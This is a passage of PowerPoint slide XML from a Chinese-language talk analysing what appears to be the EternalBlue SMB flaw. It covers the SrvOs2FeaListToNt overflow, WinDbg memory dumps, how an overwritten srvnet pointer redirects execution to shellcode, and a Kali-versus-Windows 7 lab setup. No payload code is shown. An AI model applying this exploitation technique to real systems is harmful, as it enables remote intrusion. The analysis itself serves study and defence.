              <a:t>SrvOs2FeaListToNt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数处理。就像一开始分析的那样这个函数里触发一个字段操作错误，把相邻的内存块覆盖了。而被覆盖的这块内存恰恰正好是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>srvnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>驱动之前接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的接收环境块。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="619643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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F21AC8D-A74E-4C2D-B1A7-5A398C54A3F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1705191823"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="258783"/>
          <a:ext cx="6096000" cy="28124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43037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1648184">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>kd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt; dt 8681103C _MDL</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ntdll</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>!_MDL</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+0x000 Next             : 0xffffffff _MDL</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+0x004 Size             : 0n96</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+0x006 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>MdlFlags</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>         : 0n4100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+0x008 Process          : (null) </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+0x00c </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>MappedSystemVa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>   : 0xffdfef80 Void</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+0x010 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>StartVa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>          : (null) </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+0x014 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ByteCount</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        : 0xffd00010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+0x018 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ByteOffset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>       : 0xffffffff</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="18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
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED27E5A-DFE9-471F-AE1C-E48F0B6236D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2492282"/>
            <a:ext cx="5895862" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>再看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>描述的内存地址变成了什么。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD80A5F4-FA46-403E-BE4D-7E616D325625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-56799" y="4376258"/>
            <a:ext cx="6096000" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>描述的内存地址变成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0xffdfef80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>因为链接之前接收了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>再接收的话会把数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>COPY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0xffdfef80+0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的地方，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0xffdff000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>位置。而这个位置是可写可执行的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3271E271-789C-4A3A-AECE-38A511F51B3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="644332370"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="4230778"/>
          <a:ext cx="6096000" cy="17151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43037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1648184">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>kd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt; !</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>pte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 0xffdff000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                    VA ffdff000</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PDE at C0603FF0            PTE at C07FEFF8</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>contains 000000000018A063  contains 00000000001E2163</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>pfn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 18a       ---DA--KWEV  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>pfn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 1e2       -G-DA--KWEV</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="69219" marR="69219" marT="34610" marB="34610"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2735663332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1843584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二、漏洞分析</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28FD4127-7FE0-4FDF-8A08-6A07267BCA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="843558"/>
            <a:ext cx="2016224" cy="106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漏洞利用分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED27E5A-DFE9-471F-AE1C-E48F0B6236D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2505675"/>
            <a:ext cx="11700994" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下面发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SHELLCODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就会被写到这个位置。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>当接收完成后会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>srvnet!SrvNetWskReceiveComplete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>即接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IRP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的完成函数，同时会把接收环境块传回来。在偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的位置存储着一个地址指向了一块内存，这块内存偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x16c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一个函数指针数据，分别是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SrvConnectHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SrvReceiveHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SrvDisconnectHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SrvCredentialHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。很明显在覆盖后，偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的位置变成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ffdff020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，变成了接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SHELLCODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的内存区，完成成攻击者的控制。从而能很轻松就转到攻击代码部份执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13870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3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击机：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.129</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>靶机：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows 7 64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.130</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
